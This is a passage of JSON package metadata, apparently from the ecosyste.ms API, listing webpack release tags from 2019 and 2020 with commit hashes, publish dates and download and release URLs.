v5.0.0-beta.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31/manifests"},{"name":"v5.0.0-beta.30","sha":"922c95e9b458e44b999aca2c45d9540079a225b2","kind":"tag","published_at":"2020-09-11T21:55:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30/manifests"},{"name":"v5.0.0-beta.29","sha":"7bc3a031996d17d859d7a5b077ce1c5ab5dc7e29","kind":"tag","published_at":"2020-08-28T19:21:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29/manifests"},{"name":"v5.0.0-beta.28","sha":"e32daa9be5fed184c8befac87216a88872f7df4a","kind":"tag","published_at":"2020-08-20T09:42:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28/manifests"},{"name":"v5.0.0-beta.27","sha":"3cdff531d77ee63251a385e3b6e3ccca2ec37a64","kind":"tag","published_at":"2020-08-19T20:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27/manifests"},{"name":"v5.0.0-beta.26","sha":"f2b68e0b77a3b4199c0d6989eeb69bd9a0bdb2ed","kind":"tag","published_at":"2020-08-14T19:06:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26/manifests"},{"name":"v5.0.0-beta.25","sha":"377348be6c32895a3d440b3643963f71c730aa85","kind":"tag","published_at":"2020-08-10T14:13:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25/manifests"},{"name":"v5.0.0-beta.24","sha":"bcc93305d8558285d30ea7142517491c3cdfd46c","kind":"tag","published_at":"2020-08-05T12:29:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24/manifests"},{"name":"v5.0.0-beta.23","sha":"a14f073b358a9391dc70e791b6309adcdc21ec79","kind":"tag","published_at":"2020-08-02T05:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23/manifests"},{"name":"v4.44.1","sha":"cd4af164784f3938353102179adfcbcf8f53949d","kind":"tag","published_at":"2020-07-30T08:02:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1/manifests"},{"name":"v4.44.0","sha":"d4603c6d7ef4acfbe956ef49d8476c7368526989","kind":"tag","published_at":"2020-07-24T17:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0/manifests"},{"name":"v5.0.0-beta.22","sha":"00226ff3de02078c641ef0426a5425c184510b8a","kind":"tag","published_at":"2020-07-09T11:51:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22/manifests"},{"name":"v5.0.0-beta.21","sha":"20ba3c07803a3fd580755937016f0d5c85c1ccd3","kind":"tag","published_at":"2020-07-06T21:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21/manifests"},{"name":"v5.0.0-beta.20","sha":"8efea230e05561fbaf3f9872e01affcac399cb3a","kind":"tag","published_at":"2020-06-29T16:29:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20/manifests"},{"name":"v5.0.0-beta.19","sha":"3347fa1cee621c7f684b25507fdaed3264e8dcd9","kind":"tag","published_at":"2020-06-29T15:19:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19/manifests"},{"name":"v5.0.0-beta.18","sha":"5c9fdeb9e1158a45de2350a7e858f550d73adf55","kind":"tag","published_at":"2020-06-17T23:25:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18/manifests"},{"name":"v5.0.0-beta.17","sha":"a0716cf6bc074ec0d21fe72120cda103dabf8f9a","kind":"tag","published_at":"2020-06-03T07:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17/manifests"},{"name":"v5.0.0-beta.16","sha":"b7f08b42b85f89e52facac426251d26ec64f2e6d","kind":"tag","published_at":"2020-05-05T22:03:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16/manifests"},{"name":"v4.43.0","sha":"c9d4ff7b054fc581c96ce0e53432d44f9dd8ca72","kind":"tag","published_at":"2020-04-21T14:24:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0/manifests"},{"name":"v5.0.0-beta.15","sha":"4c7e5e667bd30affa2e8c3bc8c65fd38e90912fe","kind":"tag","published_at":"2020-04-21T12:06:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15/manifests"},{"name":"v4.42.1","sha":"71eb5931dbd7db125109a95692065333cea936a9","kind":"tag","published_at":"2020-03-24T06:23:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1/manifests"},{"name":"v5.0.0-beta.14","sha":"59f8dc824ec169252476fa5b476e14c95f7bda40","kind":"tag","published_at":"2020-03-02T16:32:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14/manifests"},{"name":"v4.42.0","sha":"29d851bf6d1e5d59eafb688d51396e70d12057c9","kind":"tag","published_at":"2020-03-02T08:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0/manifests"},{"name":"v4.41.6","sha":"71be3bfa45a55aa8ea1b954ab1302565bb073bbc","kind":"tag","published_at":"2020-02-11T10:16:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6/manifests"},{"name":"v5.0.0-beta.13","sha":"8445f06fa9abac1c98e6057af1c1fd2de63babbd","kind":"tag","published_at":"2020-01-29T21:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13/manifests"},{"name":"v5.0.0-beta.12","sha":"228c1caaaff0938be2792cd516e5171cc2ce5e49","kind":"tag","published_at":"2020-01-16T00:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12/manifests"},{"name":"v4.41.5","sha":"45ecebc9f0486c43efc7b56f2c31426d94a55264","kind":"tag","published_at":"2019-12-27T21:09:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5/manifests"},{"name":"v5.0.0-beta.11","sha":"3e3b7a2e363dc7746cbde1abbfa188e8aa7f1dea","kind":"tag","published_at":"2019-12-24T07:28:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11/manifests"},{"name":"v5.0.0-beta.10","sha":"bd21c4d04f15d54f3a8233b742aebdd4b62bb9c2","kind":"tag","published_at":"2019-12-22T00:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10/manifests"},{"name":"v4.41.4","sha":"dcc45dd977356f08061b2e9451792c6218910891","kind":"tag","published_at":"2019-12-19T07:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4/manifests"},{"name":"v4.41.3","sha":"df9f3eb7d9e4e60e53bfd1595d857bc7f912bc21","kind":"tag","published_at":"2019-12-16T09:33:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3/manifests"},{"name":"v5.0.0-beta.9","sha":"3ae73b62326e12546949e1d21db25b93b064e81b","kind":"tag","published_at":"2019-12-08T21:50:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9/manifests"},{"name":"v5.0.0-beta.8","sha":"9ffda5aee96a6456a2cfe11853d2a0bf5118c7cb","kind":"tag","published_at":"2019-12-08T21:44:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8/manifests"},{"name":"v5.0.0-beta.7","sha":"697ebe81e13681093e9e643986e5011e0aa3a398","kind":"tag","published_at":"2019-11-20T21:51:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7/manifests"},{"name":"v5.0.0-beta.6","sha":"de1e11b0b5209440a2992eb4ed7dd2ec30391c8f","kind":"tag","published_at":"2019-11-14T21:54:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6/manifests"},{"name":"v5.0.0-beta.5","sha":"85145cebf3ed50014b36e76047681bbb066bbe1f","kind":"tag","published_at":"2019-11-13T13:32:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5/manifests"},{"name":"v5.0.0-beta.4","sha":"f6f5364ad18fcf1b5a33e66d3350d6809ddb03e4","kind":"tag","published_at":"2019-11-12T18:09:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4/manifests"},{"name":"v5.0.0-beta.3","sha":"43afd3d8ee53eb31a61ac78d4bfe067cd63a7fab","kind":"tag","published_at":"2019-11-06T00:09:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3/manifests"},{"name":"v5.0.0-beta.2","sha":"b3e42f3d67df70d5d7cadb47efa2078b97a01ab8","kind":"tag","published_at":"2019-10-31T07:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2/manifests"},{"name":"v5.0.0-beta.1","sha":"4940cb1536967ecfafb4267b2e912ef376481896","kind":"tag","published_at":"2019-10-22T15:56:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1/manifests"},{"name":"v4.41.2","sha":"11e94dd2d0a8d8baae75e715ff8a69f27a9e3014","kind":"tag","published_at":"2019-10-15T13:01:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2/manifests"},{"name":"v5.0.0-beta.0","sha":"1bd85218c0e5adc54f381a63e4187e5fe435a81f","kind":"tag","published_at":"2019-10-11T12:58:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0/manifests"},{"name":"v5.0.0-alpha.32","sha":"8a73bc411b470f5d211053c99efbc1569d630f1b","kind":"tag","published_at":"2019-10-11T12:55:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32/manifests"},{"name":"v4.41.1","sha":"dcfda0061cef24d68312216893da0b38f4a670f9","kind":"tag","published_at":"2019-10-11T11:42:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1/manifests"},{"name":"v5.0.0-alpha.31","sha":"2bebf88509441835b71af9904e574ea6303642b7","kind":"tag","published_at":"2019-10-10T20:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.31","tag_url":"